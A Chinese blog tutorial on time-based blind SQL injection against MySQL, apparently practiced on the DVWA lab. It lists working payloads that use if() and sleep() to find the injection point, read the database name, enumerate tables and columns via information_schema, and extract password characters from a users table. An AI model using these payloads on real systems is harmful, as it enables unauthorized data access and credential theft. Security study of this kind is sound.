首页 > 数据库 >SQL时间盲注

SQL时间盲注

时间:2024-02-01 16:58:15浏览次数:45  
标签:name limit 时间 select SQL table 盲注 sleep schema

由于页面无法返回正确或错误的值,所以只能通过if加sleep函数解决问题

函数:

sleep(N)函数
即如果写入到数据库被执行了,sleep(N)可以让此语句运行N秒钟
(通过执行时间来判断是否被执行,但是可能会因网速等问题参数误差)

if()函数
​ if(a,b,c),如果a的值为true,则返回b的值,如果a的值为false,则返回c的值

判断注入点

1' and sleep(3)#

判断数据库长度

1' and if((length(database()))=10,sleep(3),1)#

判断数据库名

1' and if(ascii(substr(database(),1,1))=100,sleep(3),1)#

判断表长

1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>3,sleep(3),1)#

判断表名

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)#

判断字段长度

1' and if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>3,sleep(3),1)#

判断字段名

1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>10,sleep(3),1)#

爆数据

1' and if(ascii(substr((select password from dvwa.users limit 0,1),1,1))>10, sleep(3),0)#

标签:name,limit,时间,select,SQL,table,盲注,sleep,schema
From: https://www.cnblogs.com/p1ggy/p/18001602

相关文章

  • 判断当前时间是否在"07:07~10:10"格式数据时间段内;
    /***判断当前时间是否在"07:07~10:10"格式数据时间段内;*@param`timeStr`*@return*/privatebooleanisInTimeRange(StringtimeStr){String[]parts=timeStr.split("[~|:]");if(parts.length!=4){......
  • c# linq-to-sql 连接sqlserver数据库
    在已有项目下,点击新建项: 输入服务器名称:详见sqlserver登录页,如下所示:其中服务器名称、登录名、密码一一对应。且登录名必须为sa 接着选择连接的数据库名称-》点击测试连接,测试是否正常连接数据库。点击确认完成创建。 完成增删改查操作代码示例:///<summary>///......
  • python连接mysql8、sqlserver2012
    python连接mysql比较顺利,网上很多代码,连接sqlserver的例子少,且很多错误,尝试很多帖子,最后成功代码如下。#连接mysqlimportpymysqldefconn():try:connection=pymysql.connect(host='localhost',port=3306,user='root',password='123456',database='cl&#......
  • 安装MySQL出现由于找不到vcruntime140_1.dll,无法继续执行代码的提示
    问题描述:在安装MySQL服务的时候,执行安装命令提示如下的错误信息。解决方法:通过分析可以知道,是由于缺少了vcruntime140_1.dll动态链接库文件,这是windows缺少vc_redist.x64.exe程序导致的服务安装错误,与我们要安装的MySQL服务并没有关系。(如果您的安装过VS类型的工具,就不会提示该......
  • CentOs在线安装MySQL最新版本
    更新系统yumupdate-y清理YUM软件包管理器的缓存(包括软件包文件和元数据,可以释放磁盘空间并删除旧的缓存数据)yumcleanall添加MySQLYumRepository:MySQL提供了官方的Yum存储库,可以通过它安装最新的MySQL版本。运行以下命令添加MySQL存储库:yuminstall-y......
  • Ctfer-Sql注入从0到0.1
    一、判断是否存在sql注入漏洞1.单引号判断http://www.xxx.com/xxx.asp?id=10'如果出现错误提示 youhaveanerrorinyoursqlsyntax则该网站可能就存在注入漏洞。二、判断注入类型字符型and数字型数字型:Or判断(or跟and判断方法不一样的,and是提交返回错误才有注入点,......
  • MySQL的安装目录。
    1.MySQL安装完成后,会在磁盘上生成一个目录,该目录就被称为MySQL的安装目录。主目录下面有一些子目录,为了更好的使用MySQL数据库,需要了解各级目录的功能2.目录结构如下:1)bin文件夹:用于放置一些可执行文件.exe,如mysql.exe,mysqld.exe 2)include文件夹用于放置一些头文件.......
  • sql中直接导出为csv
    导出为csvselectm.SETL_IDfrom(selectSETL_IDfromychlunionselect'SETL_ID')morderbym.SETL_IDdescintooutfile'E:/xy/file0.csv'fieldsterminatedby','optionallyenclosedby'"'escapedby'"......
  • 帝国cms看雪时间轴博客趣静态模板bokequV1.
    帝国cms看雪时间轴博客趣静态模板bokequV1.0是一款女生唯美简洁个人博客静态页面模板,蓝色时间轴个人网页模板,下雪空间个人模板。喜欢的网友可以用开源程序帝国cms标签仿站建设http://www.bokequ.com/category/theme博客趣bokequV1.0模板非常简洁清爽,清新优雅,由蓝色背景+......
  • SQL PARTITION BY 语句把一张表分组后的最大值或最小值插入另一张表里
    1.例子见前一章,目的是有分组的,只显示OrderAmount最高的(即每组只显示一列) 2.再建一个表来存储CREATETABLE[dbo].[MaxOrders]([orderid][int]NULL,[Orderdate][date]NULL,[CustomerName][varchar](100)NULL,[Customercity][varchar](100)NULL,......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99